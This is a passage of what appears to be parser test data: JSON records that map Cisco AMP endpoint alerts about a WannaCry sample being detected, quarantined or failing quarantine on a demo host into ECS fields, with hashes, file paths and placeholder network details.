"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064601", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843730684Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064598", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843732572Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064600", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "cmd.exe", + "pid": 3200, + "hash": { + "sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "md5": "ad7b9c14083b52bc532fba5948342b98" + } + }, + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "name": "tasksche.exe", + "path": 
"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843734515Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275399255032000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275399255031906", + "event_type_id": 1090519054 + } + }, + 
"tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 2708, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843736405Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275399255032000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275399255031905", + "event_type_id": 
1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843738275Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275399255032000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275399255031904", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843740157Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419275399255032000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419275394960064599", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843765247Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275394960065000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064597", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843776640Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275394960065000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275394960064596", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843778667Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": 
